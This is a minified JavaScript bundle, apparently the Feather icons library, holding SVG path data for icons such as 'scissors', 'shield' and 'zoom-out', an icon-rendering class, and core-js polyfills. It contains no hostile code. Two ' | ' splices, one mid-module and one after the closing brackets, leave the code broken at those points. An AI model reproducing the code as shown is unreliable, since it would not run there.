scissors: '<circle cx="6" cy="6" r="3"></circle><circle cx="6" cy="18" r="3"></circle><line x1="20" y1="4" x2="8.12" y2="15.88"></line><line x1="14.47" y1="14.48" x2="20" y2="20"></line><line x1="8.12" y1="8.12" x2="12" y2="12"></line>',
search: '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line>',
send: '<line x1="22" y1="2" x2="11" y2="13"></line><polygon points="22 2 15 22 11 13 2 9 22 2"></polygon>',
server: '<rect x="2" y="2" width="20" height="8" rx="2" ry="2"></rect><rect x="2" y="14" width="20" height="8" rx="2" ry="2"></rect><line x1="6" y1="6" x2="6.01" y2="6"></line><line x1="6" y1="18" x2="6.01" y2="18"></line>',
settings: '<circle cx="12" cy="12" r="3"></circle><path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-1.82-.33 1.65 1.65 0 0 0-1 1.51V21a2 2 0 0 1-2 2 2 2 0 0 1-2-2v-.09A1.65 1.65 0 0 0 9 19.4a1.65 1.65 0 0 0-1.82.33l-.06.06a2 2 0 0 1-2.83 0 2 2 0 0 1 0-2.83l.06-.06a1.65 1.65 0 0 0 .33-1.82 1.65 1.65 0 0 0-1.51-1H3a2 2 0 0 1-2-2 2 2 0 0 1 2-2h.09A1.65 1.65 0 0 0 4.6 9a1.65 1.65 0 0 0-.33-1.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 1.82.33H9a1.65 1.65 0 0 0 1-1.51V3a2 2 0 0 1 2-2 2 2 0 0 1 2 2v.09a1.65 1.65 0 0 0 1 1.51 1.65 1.65 0 0 0 1.82-.33l.06-.06a2 2 0 0 1 2.83 0 2 2 0 0 1 0 2.83l-.06.06a1.65 1.65 0 0 0-.33 1.82V9a1.65 1.65 0 0 0 1.51 1H21a2 2 0 0 1 2 2 2 2 0 0 1-2 2h-.09a1.65 1.65 0 0 0-1.51 1z"></path>',
"share-2": '<circle cx="18" cy="5" r="3"></circle><circle cx="6" cy="12" r="3"></circle><circle cx="18" cy="19" r="3"></circle><line x1="8.59" y1="13.51" x2="15.42" y2="17.49"></line><line x1="15.41" y1="6.51" x2="8.59" y2="10.49"></line>',
share: '<path d="M4 12v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8"></path><polyline points="16 6 12 2 8 6"></polyline><line x1="12" y1="2" x2="12" y2="15"></line>',
"shield-off": '<path d="M19.69 14a6.9 6.9 0 0 0 .31-2V5l-8-3-3.16 1.18"></path><path d="M4.73 4.73L4 5v7c0 6 8 10 8 10a20.29 20.29 0 0 0 5.62-4.38"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
shield: '<path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"></path>',
"shopping-bag": '<path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z"></path><line x1="3" y1="6" x2="21" y2="6"></line><path d="M16 10a4 4 0 0 1-8 0"></path>',
"shopping-cart": '<circle cx="9" cy="21" r="1"></circle><circle cx="20" cy="21" r="1"></circle><path d="M1 1h4l2.68 13.39a2 2 0 0 0 2 1.61h9.72a2 2 0 0 0 2-1.61L23 6H6"></path>',
shuffle: '<polyline points="16 3 21 3 21 8"></polyline><line x1="4" y1="20" x2="21" y2="3"></line><polyline points="21 16 21 21 16 21"></polyline><line x1="15" y1="15" x2="21" y2="21"></line><line x1="4" y1="4" x2="9" y2="9"></line>',
sidebar: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="9" y1="3" x2="9" y2="21"></line>',
"skip-back": '<polygon points="19 20 9 12 19 4 19 20"></polygon><line x1="5" y1="19" x2="5" y2="5"></line>',
"skip-forward": '<polygon points="5 4 15 12 5 20 5 4"></polygon><line x1="19" y1="5" x2="19" y2="19"></line>',
slack: '<path d="M14.5 10c-.83 0-1.5-.67-1.5-1.5v-5c0-.83.67-1.5 1.5-1.5s1.5.67 1.5 1.5v5c0 .83-.67 1.5-1.5 1.5z"></path><path d="M20.5 10H19V8.5c0-.83.67-1.5 1.5-1.5s1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"></path><path d="M9.5 14c.83 0 1.5.67 1.5 1.5v5c0 .83-.67 1.5-1.5 1.5S8 21.33 8 20.5v-5c0-.83.67-1.5 1.5-1.5z"></path><path d="M3.5 14H5v1.5c0 .83-.67 1.5-1.5 1.5S2 16.33 2 15.5 2.67 14 3.5 14z"></path><path d="M14 14.5c0-.83.67-1.5 1.5-1.5h5c.83 0 1.5.67 1.5 1.5s-.67 1.5-1.5 1.5h-5c-.83 0-1.5-.67-1.5-1.5z"></path><path d="M15.5 19H14v1.5c0 .83.67 1.5 1.5 1.5s1.5-.67 1.5-1.5-.67-1.5-1.5-1.5z"></path><path d="M10 9.5C10 8.67 9.33 8 8.5 8h-5C2.67 8 2 8.67 2 9.5S2.67 11 3.5 11h5c.83 0 1.5-.67 1.5-1.5z"></path><path d="M8.5 5H10V3.5C10 2.67 9.33 2 8.5 2S7 2.67 7 3.5 7.67 5 8.5 5z"></path>',
slash: '<circle cx="12" cy="12" r="10"></circle><line x1="4.93" y1="4.93" x2="19.07" y2="19.07"></line>',
sliders: '<line x1="4" y1="21" x2="4" y2="14"></line><line x1="4" y1="10" x2="4" y2="3"></line><line x1="12" y1="21" x2="12" y2="12"></line><line x1="12" y1="8" x2="12" y2="3"></line><line x1="20" y1="21" x2="20" y2="16"></line><line x1="20" y1="12" x2="20" y2="3"></line><line x1="1" y1="14" x2="7" y2="14"></line><line x1="9" y1="8" x2="15" y2="8"></line><line x1="17" y1="16" x2="23" y2="16"></line>',
smartphone: '<rect x="5" y="2" width="14" height="20" rx="2" ry="2"></rect><line x1="12" y1="18" x2="12.01" y2="18"></line>',
smile: '<circle cx="12" cy="12" r="10"></circle><path d="M8 14s1.5 2 4 2 4-2 4-2"></path><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
speaker: '<rect x="4" y="2" width="16" height="20" rx="2" ry="2"></rect><circle cx="12" cy="14" r="4"></circle><line x1="12" y1="6" x2="12.01" y2="6"></line>',
square: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect>',
star: '<polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon>',
"stop-circle": '<circle cx="12" cy="12" r="10"></circle><rect x="9" y="9" width="6" height="6"></rect>',
sun: '<circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>',
sunrise: '<path d="M17 18a5 5 0 0 0-10 0"></path><line x1="12" y1="2" x2="12" y2="9"></line><line x1="4.22" y1="10.22" x2="5.64" y2="11.64"></line><line x1="1" y1="18" x2="3" y2="18"></line><line x1="21" y1="18" x2="23" y2="18"></line><line x1="18.36" y1="11.64" x2="19.78" y2="10.22"></line><line x1="23" y1="22" x2="1" y2="22"></line><polyline points="8 6 12 2 16 6"></polyline>',
sunset: '<path d="M17 18a5 5 0 0 0-10 0"></path><line x1="12" y1="9" x2="12" y2="2"></line><line x1="4.22" y1="10.22" x2="5.64" y2="11.64"></line><line x1="1" y1="18" x2="3" y2="18"></line><line x1="21" y1="18" x2="23" y2="18"></line><line x1="18.36" y1="11.64" x2="19.78" y2="10.22"></line><line x1="23" y1="22" x2="1" y2="22"></line><polyline points="16 5 12 9 8 5"></polyline>',
tablet: '<rect x="4" y="2" width="16" height="20" rx="2" ry="2"></rect><line x1="12" y1="18" x2="12.01" y2="18"></line>',
tag: '<path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>',
target: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="6"></circle><circle cx="12" cy="12" r="2"></circle>',
terminal: '<polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line>',
thermometer: '<path d="M14 14.76V3.5a2.5 2.5 0 0 0-5 0v11.26a4.5 4.5 0 1 0 5 0z"></path>',
"thumbs-down": '<path d="M10 15v4a3 3 0 0 0 3 3l4-9V2H5.72a2 2 0 0 0-2 1.7l-1.38 9a2 2 0 0 0 2 2.3zm7-13h2.67A2.31 2.31 0 0 1 22 4v7a2.31 2.31 0 0 1-2.33 2H17"></path>',
"thumbs-up": '<path d="M14 9V5a3 3 0 0 0-3-3l-4 9v11h11.28a2 2 0 0 0 2-1.7l1.38-9a2 2 0 0 0-2-2.3zM7 22H4a2 2 0 0 1-2-2v-7a2 2 0 0 1 2-2h3"></path>',
"toggle-left": '<rect x="1" y="5" width="22" height="14" rx="7" ry="7"></rect><circle cx="8" cy="12" r="3"></circle>',
"toggle-right": '<rect x="1" y="5" width="22" height="14" rx="7" ry="7"></rect><circle cx="16" cy="12" r="3"></circle>',
tool: '<path d="M14.7 6.3a1 1 0 0 0 0 1.4l1.6 1.6a1 1 0 0 0 1.4 0l3.77-3.77a6 6 0 0 1-7.94 7.94l-6.91 6.91a2.12 2.12 0 0 1-3-3l6.91-6.91a6 6 0 0 1 7.94-7.94l-3.76 3.76z"></path>',
"trash-2": '<polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path><line x1="10" y1="11" x2="10" y2="17"></line><line x1="14" y1="11" x2="14" y2="17"></line>',
trash: '<polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path>',
trello: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><rect x="7" y="7" width="3" height="9"></rect><rect x="14" y="7" width="3" height="5"></rect>',
"trending-down": '<polyline points="23 18 13.5 8.5 8.5 13.5 1 6"></polyline><polyline points="17 18 23 18 23 12"></polyline>',
"trending-up": '<polyline points="23 6 13.5 15.5 8.5 10.5 1 18"></polyline><polyline points="17 6 23 6 23 12"></polyline>',
triangle: '<path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path>',
truck: '<rect x="1" y="3" width="15" height="13"></rect><polygon points="16 8 20 8 23 11 23 16 16 16 16 8"></polygon><circle cx="5.5" cy="18.5" r="2.5"></circle><circle cx="18.5" cy="18.5" r="2.5"></circle>',
tv: '<rect x="2" y="7" width="20" height="15" rx="2" ry="2"></rect><polyline points="17 2 12 7 7 2"></polyline>',
twitch: '<path d="M21 2H3v16h5v4l4-4h5l4-4V2zm-10 9V7m5 4V7"></path>',
twitter: '<path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>',
type: '<polyline points="4 7 4 4 20 4 20 7"></polyline><line x1="9" y1="20" x2="15" y2="20"></line><line x1="12" y1="4" x2="12" y2="20"></line>',
umbrella: '<path d="M23 12a11.05 11.05 0 0 0-22 0zm-5 7a3 3 0 0 1-6 0v-7"></path>',
underline: '<path d="M6 3v7a6 6 0 0 0 6 6 6 6 0 0 0 6-6V3"></path><line x1="4" y1="21" x2="20" y2="21"></line>',
unlock: '<rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 9.9-1"></path>',
"upload-cloud": '<polyline points="16 16 12 12 8 16"></polyline><line x1="12" y1="12" x2="12" y2="21"></line><path d="M20.39 18.39A5 5 0 0 0 18 9h-1.26A8 8 0 1 0 3 16.3"></path><polyline points="16 16 12 12 8 16"></polyline>',
upload: '<path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="17 8 12 3 7 8"></polyline><line x1="12" y1="3" x2="12" y2="15"></line>',
"user-check": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><polyline points="17 11 19 13 23 9"></polyline>',
"user-minus": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="23" y1="11" x2="17" y2="11"></line>',
"user-plus": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="20" y1="8" x2="20" y2="14"></line><line x1="23" y1="11" x2="17" y2="11"></line>',
"user-x": '<path d="M16 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="8.5" cy="7" r="4"></circle><line x1="18" y1="8" x2="23" y2="13"></line><line x1="23" y1="8" x2="18" y2="13"></line>',
user: '<path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle>',
users: '<path d="M17 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path><circle cx="9" cy="7" r="4"></circle><path d="M23 21v-2a4 4 0 0 0-3-3.87"></path><path d="M16 3.13a4 4 0 0 1 0 7.75"></path>',
"video-off": '<path d="M16 16v1a2 2 0 0 1-2 2H3a2 2 0 0 1-2-2V7a2 2 0 0 1 2-2h2m5.66 0H14a2 2 0 0 1 2 2v3.34l1 1L23 7v10"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
video: '<polygon points="23 7 16 12 23 17 23 7"></polygon><rect x="1" y="5" width="15" height="14" rx="2" ry="2"></rect>',
voicemail: '<circle cx="5.5" cy="11.5" r="4.5"></circle><circle cx="18.5" cy="11.5" r="4.5"></circle><line x1="5.5" y1="16" x2="18.5" y2="16"></line>',
"volume-1": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><path d="M15.54 8.46a5 5 0 0 1 0 7.07"></path>',
"volume-2": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><path d="M19.07 4.93a10 10 0 0 1 0 14.14M15.54 8.46a5 5 0 0 1 0 7.07"></path>',
"volume-x": '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon><line x1="23" y1="9" x2="17" y2="15"></line><line x1="17" y1="9" x2="23" y2="15"></line>',
volume: '<polygon points="11 5 6 9 2 9 2 15 6 15 11 19 11 5"></polygon>',
watch: '<circle cx="12" cy="12" r="7"></circle><polyline points="12 9 12 12 13.5 13.5"></polyline><path d="M16.51 17.35l-.35 3.83a2 2 0 0 1-2 1.82H9.83a2 2 0 0 1-2-1.82l-.35-3.83m.01-10.7l.35-3.83A2 2 0 0 1 9.83 1h4.35a2 2 0 0 1 2 1.82l.35 3.83"></path>',
"wifi-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M16.72 11.06A10.94 10.94 0 0 1 19 12.55"></path><path d="M5 12.55a10.94 10.94 0 0 1 5.17-2.39"></path><path d="M10.71 5.05A16 16 0 0 1 22.58 9"></path><path d="M1.42 9a15.91 15.91 0 0 1 4.7-2.88"></path><path d="M8.53 16.11a6 6 0 0 1 6.95 0"></path><line x1="12" y1="20" x2="12.01" y2="20"></line>',
wifi: '<path d="M5 12.55a11 11 0 0 1 14.08 0"></path><path d="M1.42 9a16 16 0 0 1 21.16 0"></path><path d="M8.53 16.11a6 6 0 0 1 6.95 0"></path><line x1="12" y1="20" x2="12.01" y2="20"></line>',
wind: '<path d="M9.59 4.59A2 2 0 1 1 11 8H2m10.59 11.41A2 2 0 1 0 14 16H2m15.73-8.27A2.5 2.5 0 1 1 19.5 12H2"></path>',
"x-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="15" y1="9" x2="9" y2="15"></line><line x1="9" y1="9" x2="15" y2="15"></line>',
"x-octagon": '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon><line x1="15" y1="9" x2="9" y2="15"></line><line x1="9" y1="9" x2="15" y2="15"></line>',
"x-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="9" y1="9" x2="15" y2="15"></line><line x1="15" y1="9" x2="9" y2="15"></line>',
x: '<line x1="18" y1="6" x2="6" y2="18"></line><line x1="6" y1="6" x2="18" y2="18"></line>',
youtube: '<path d="M22.54 6.42a2.78 2.78 0 0 0-1.94-2C18.88 4 12 4 12 4s-6.88 0-8.6.46a2.78 2.78 0 0 0-1.94 2A29 29 0 0 0 1 11.75a29 29 0 0 0 .46 5.33A2.78 2.78 0 0 0 3.4 19c1.72.46 8.6.46 8.6.46s6.88 0 8.6-.46a2.78 2.78 0 0 0 1.94-2 29 29 0 0 0 .46-5.25 29 29 0 0 0-.46-5.33z"></path><polygon points="9.75 15.02 15.5 11.75 9.75 8.48 9.75 15.02"></polygon>',
"zap-off": '<polyline points="12.41 6.75 13 2 10.57 4.92"></polyline><polyline points="18.57 12.91 21 10 15.66 10"></polyline><polyline points="8 8 3 14 12 14 11 22 16 16"></polyline><line x1="1" y1="1" x2="23" y2="23"></line>',
zap: '<polygon points="13 2 3 14 12 14 11 22 21 10 12 10 13 2"></polygon>',
"zoom-in": '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line><line x1="11" y1="8" x2="11" y2="14"></line><line x1="8" y1="11" x2="14" y2="11"></line>',
"zoom-out": '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line><line x1="8" y1="11" x2="14" y2="11"></line>'
}
}, function (e) {
e.exports = {
xmlns: "http://www.w3.org/2000/svg",
width: 24,
height: 24,
viewBox: "0 0 24 24",
fill: "none",
stroke: "currentColor",
"stroke-width": 2,
"stroke-linecap": "round",
"stroke-linejoin": "round"
}
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = Object.assign || function (e) {
for (var n = 1; n < arguments.length; n++) {
var i = arguments[n];
for (var t in i) Object.prototype.hasOwnProperty.call(i, t) && (e[t] = i[t])
}
return e
},
l = function () {
function e(e, n) {
for (var i = 0; i < n.length; i++) {
var t = n[i];
t.enumerable = t.enumerable || !1, t.configurable = !0, "value" in t && (t.writable = !0), Object.defineProperty(e, t.key, t)
}
}
return function (n, i, t) {
return i && e(n.prototype, i), t && e(n, t), n
}
}(),
r = a(i(22)),
o = a(i(42));
function a(e) {
return e && e.__esModule ? e : {
default: e
}
}
var c = function () {
function e(n, i) {
var l = arguments.length > 2 && void 0 !== arguments[2] ? arguments[2] : [];
! function (e, n) {
if (!(e instanceof n)) throw new TypeError("Cannot call a class as a function")
}(this, e), this.name = n, this.contents = i, this.tags = l, this.attrs = t({}, o.default, {
class: "feather feather-" + n
})
}
return l(e, [{
key: "toSvg",
value: function () {
var e = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : {};
return "<svg " + function (e) {
return Object.keys(e).map(function (n) {
return n + '="' + e[n] + '"'
}).join(" ")
}(t({}, this.attrs, e, {
class: (0, r.default)(this.attrs.class, e.class)
})) + ">" + this.contents + "</svg>"
}
}, {
key: "toString",
value: function () {
return this.contents
}
}]), e
}();
n.default = c
}, function (e, n, i) {
"use strict";
var t = o(i(12)),
l = o(i(39)),
r = o(i(38));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
e.exports = {
icons: t.default,
toSvg: l.default,
replace: r.default
}
}, function (e, n, i) {
e.exports = i(0)
}, function (e, n, i) {
var t = i(2)("iterator"),
l = !1;
try {
var r = 0,
o = {
next: function () {
return {
done: !!r++
}
},
return: function () {
l = !0
}
};
o[t] = function () {
return this
}, Array.from(o, function () {
throw 2
})
} catch (e) {}
e.exports = function (e, n) {
if (!n && !l) return !1;
var i = !1;
try {
var r = {};
r[t] = function () {
return {
next: function () {
return {
done: i = !0
}
}
}
}, e(r)
} catch (e) {}
return i
}
}, function (e, n, i) {
var t = i(30),
l = i(2)("toStringTag"),
r = "Arguments" == t(function () {
return arguments
}());
e.exports = function (e) {
var n, i, o;
return void 0 === e ? "Undefined" : null === e ? "Null" : "string" == typeof (i = function (e, n) {
try {
return e[n]
} catch (e) {}
}(n = Object(e), l)) ? i : r ? t(n) : "Object" == (o = t(n)) && "function" == typeof n.callee ? "Arguments" : o
}
}, function (e, n, i) {
var t = i(47),
l = i(9),
r = i(2)("iterator");
e.exports = function (e) {
if (void 0 != e) return e[r] || e["@@iterator"] || l[t(e)]
}
}, function (e, n, i) {
"use strict";
var t = i(18),
l = i(7),
r = i(10);
e.exports = function (e, n, i) {
var o = t(n);
o in e ? l.f(e, o, r(0, i)) : e[o] = i
}
}, function (e, n, i) {
var t = i(2),
l = i(9),
r = t("iterator"),
o = Array.prototype;
e.exports = function (e) {
return void 0 !== e && (l.Array === e || o[r] === e)
}
}, function (e, n, i) {
var t = i(3);
e.exports = function (e, n, i, l) {
try {
return l ? n(t(i)[0], i[1]) : n(i)
} catch (n) {
var r = e.return;
throw void 0 !== r && t(r.call(e)), n
}
}
}, function (e, n) {
e.exports = function (e) {
if ("function" != typeof e) throw TypeError(String(e) + " is not a function");
return e
}
}, function (e, n, i) {
var t = i(52);
e.exports = function (e, n, i) {
if (t(e), void 0 === n) return e;
switch (i) {
case 0:
return function () {
return e.call(n)
};
case 1:
return function (i) {
return e.call(n, i)
};
case 2:
return function (i, t) {
return e.call(n, i, t)
};
case 3:
return function (i, t, l) {
return e.call(n, i, t, l)
}
}
return function () {
return e.apply(n, arguments)
}
}
}, function (e, n, i) {
"use strict";
var t = i(53),
l = i(24),
r = i(51),
o = i(50),
a = i(27),
c = i(49),
p = i(48);
e.exports = function (e) {
var n, i, y, h, x = l(e),
s = "function" == typeof this ? this : Array,
u = arguments.length,
d = u > 1 ? arguments[1] : void 0,
f = void 0 !== d,
g = 0,
v = p(x);
if (f && (d = t(d, u > 2 ? arguments[2] : void 0, 2)), void 0 == v || s == Array && o(v))
for (i = new s(n = a(x.length)); n > g; g++) c(i, g, f ? d(x[g], g) : x[g]);
else
for (h = v.call(x), i = new s; !(y = h.next()).done; g++) c(i, g, f ? r(h, d, [y.value, g], !0) : y.value);
return i.length = g, i
}
}, function (e, n, i) {
var t = i(32),
l = i(54);
t({
target: "Array",
stat: !0,
forced: !i(46)(function (e) {
Array.from(e)
})
}, {
from: l
})
}, function (e, n, i) {
var t = i(6),
l = i(3);
e.exports = function (e, n) {
if (l(e), !t(n) && null !== n) throw TypeError("Can't set " + String(n) + " as a prototype")
}
}, function (e, n, i) {
var t = i(56);
e.exports = Object.setPrototypeOf || ("__proto__" in {} ? function () {
var e, n = !1,
i = {};
try {
(e = Object.getOwnPropertyDescriptor(Object.prototype, "__proto__").set).call(i, []), n = i instanceof Array
} catch (e) {}
return function (i, l) {
return t(i, l), n ? e.call(i, l) : i.__proto__ = l, i
}
}() : void 0)
}, function (e, n, i) {
var t = i(0).document;
e.exports = t && t.documentElement
}, function (e, n, i) {
var t = i(28),
l = i(13);
e.exports = Object.keys || function (e) {
return t(e, l)
}
}, function (e, n, i) { | r = i(3),
o = i(59);
e.exports = t ? Object.defineProperties : function (e, n) {
r(e);
for (var i, t = o(n), a = t.length, c = 0; a > c;) l.f(e, i = t[c++], n[i]);
return e
}
}, function (e, n, i) {
var t = i(3),
l = i(60),
r = i(13),
o = i(15),
a = i(58),
c = i(34),
p = i(16)("IE_PROTO"),
y = function () {},
h = function () {
var e, n = c("iframe"),
i = r.length;
for (n.style.display = "none", a.appendChild(n), n.src = String("javascript:"), (e = n.contentWindow.document).open(), e.write("<script>document.F=Object<\/script>"), e.close(), h = e.F; i--;) delete h.prototype[r[i]];
return h()
};
e.exports = Object.create || function (e, n) {
var i;
return null !== e ? (y.prototype = t(e), i = new y, y.prototype = null, i[p] = e) : i = h(), void 0 === n ? i : l(i, n)
}, o[p] = !0
}, function (e, n, i) {
var t = i(4);
e.exports = !!Object.getOwnPropertySymbols && !t(function () {
return !String(Symbol())
})
}, function (e, n, i) {
var t = i(4);
e.exports = !t(function () {
function e() {}
return e.prototype.constructor = null, Object.getPrototypeOf(new e) !== e.prototype
})
}, function (e, n, i) {
"use strict";
var t = i(26).IteratorPrototype,
l = i(61),
r = i(10),
o = i(23),
a = i(9),
c = function () {
return this
};
e.exports = function (e, n, i) {
var p = n + " Iterator";
return e.prototype = l(t, {
next: r(1, i)
}), o(e, p, !1, !0), a[p] = c, e
}
}, function (e, n, i) {
var t = i(4),
l = /#|\.prototype\./,
r = function (e, n) {
var i = a[o(e)];
return i == p || i != c && ("function" == typeof n ? t(n) : !!n)
},
o = r.normalize = function (e) {
return String(e).replace(l, ".").toLowerCase()
},
a = r.data = {},
c = r.NATIVE = "N",
p = r.POLYFILL = "P";
e.exports = r
}, function (e, n) {
n.f = Object.getOwnPropertySymbols
}, function (e, n, i) {
var t = i(21),
l = Math.max,
r = Math.min;
e.exports = function (e, n) {
var i = t(e);
return i < 0 ? l(i + n, 0) : r(i, n)
}
}, function (e, n, i) {
var t = i(14),
l = i(27),
r = i(67);
e.exports = function (e) {
return function (n, i, o) {
var a, c = t(n),
p = l(c.length),
y = r(o, p);
if (e && i != i) {
for (; p > y;)
if ((a = c[y++]) != a) return !0
} else
for (; p > y; y++)
if ((e || y in c) && c[y] === i) return e || y || 0;
return !e && -1
}
}
}, function (e, n, i) {
var t = i(28),
l = i(13).concat("length", "prototype");
n.f = Object.getOwnPropertyNames || function (e) {
return t(e, l)
}
}, function (e, n, i) {
var t = i(0),
l = i(69),
r = i(66),
o = i(3),
a = t.Reflect;
e.exports = a && a.ownKeys || function (e) {
var n = l.f(o(e)),
i = r.f;
return i ? n.concat(i(e)) : n
}
}, function (e, n, i) {
var t = i(1),
l = i(70),
r = i(31),
o = i(7);
e.exports = function (e, n) {
for (var i = l(n), a = o.f, c = r.f, p = 0; p < i.length; p++) {
var y = i[p];
t(e, y) || a(e, y, c(n, y))
}
}
}, function (e, n, i) {
var t = i(4),
l = i(30),
r = "".split;
e.exports = t(function () {
return !Object("z").propertyIsEnumerable(0)
}) ? function (e) {
return "String" == l(e) ? r.call(e, "") : Object(e)
} : Object
}, function (e, n, i) {
"use strict";
var t = {}.propertyIsEnumerable,
l = Object.getOwnPropertyDescriptor,
r = l && !t.call({
1: 2
}, 1);
n.f = r ? function (e) {
var n = l(this, e);
return !!n && n.enumerable
} : t
}, function (e, n, i) {
"use strict";
var t = i(32),
l = i(64),
r = i(25),
o = i(57),
a = i(23),
c = i(5),
p = i(29),
y = i(2),
h = i(17),
x = i(9),
s = i(26),
u = s.IteratorPrototype,
d = s.BUGGY_SAFARI_ITERATORS,
f = y("iterator"),
g = function () {
return this
};
e.exports = function (e, n, i, y, s, v, m) {
l(i, n, y);
var w, M, b, z = function (e) {
if (e === s && O) return O;
if (!d && e in H) return H[e];
switch (e) {
case "keys":
case "values":
case "entries":
return function () {
return new i(this, e)
}
}
return function () {
return new i(this)
}
},
A = n + " Iterator",
k = !1,
H = e.prototype,
V = H[f] || H["@@iterator"] || s && H[s],
O = !d && V || z(s),
j = "Array" == n && H.entries || V;
if (j && (w = r(j.call(new e)), u !== Object.prototype && w.next && (h || r(w) === u || (o ? o(w, u) : "function" != typeof w[f] && c(w, f, g)), a(w, A, !0, !0), h && (x[A] = g))), "values" == s && V && "values" !== V.name && (k = !0, O = function () {
return V.call(this)
}), h && !m || H[f] === O || c(H, f, O), x[n] = O, s)
if (M = {
values: z("values"),
keys: v ? O : z("keys"),
entries: z("entries")
}, m)
for (b in M) !d && !k && b in H || p(H, b, M[b]);
else t({
target: n,
proto: !0,
forced: d || k
}, M);
return M
}
}, function (e, n) {
var i;
i = function () {
return this
}();
try {
i = i || Function("return this")() || (0, eval)("this")
} catch (e) {
"object" == typeof window && (i = window)
}
e.exports = i
}, function (e, n, i) {
var t = i(0),
l = i(36),
r = t.WeakMap;
e.exports = "function" == typeof r && /native code/.test(l.call(r))
}, function (e, n, i) {
var t = i(21),
l = i(20);
e.exports = function (e, n, i) {
var r, o, a = String(l(e)),
c = t(n),
p = a.length;
return c < 0 || c >= p ? i ? "" : void 0 : (r = a.charCodeAt(c)) < 55296 || r > 56319 || c + 1 === p || (o = a.charCodeAt(c + 1)) < 56320 || o > 57343 ? i ? a.charAt(c) : r : i ? a.slice(c, c + 2) : o - 56320 + (r - 55296 << 10) + 65536
}
}, function (e, n, i) {
"use strict";
var t = i(77),
l = i(37),
r = i(74),
o = l.set,
a = l.getterFor("String Iterator");
r(String, "String", function (e) {
o(this, {
type: "String Iterator",
string: String(e),
index: 0
})
}, function () {
var e, n = a(this),
i = n.string,
l = n.index;
return l >= i.length ? {
value: void 0,
done: !0
} : (e = t(i, l, !0), n.index += e.length, {
value: e,
done: !1
})
})
}, function (e, n, i) {
i(78), i(55);
var t = i(45);
e.exports = t.Array.from
}, function (e, n, i) {
i(79), e.exports = i(44)
}])
}); | var t = i(8),
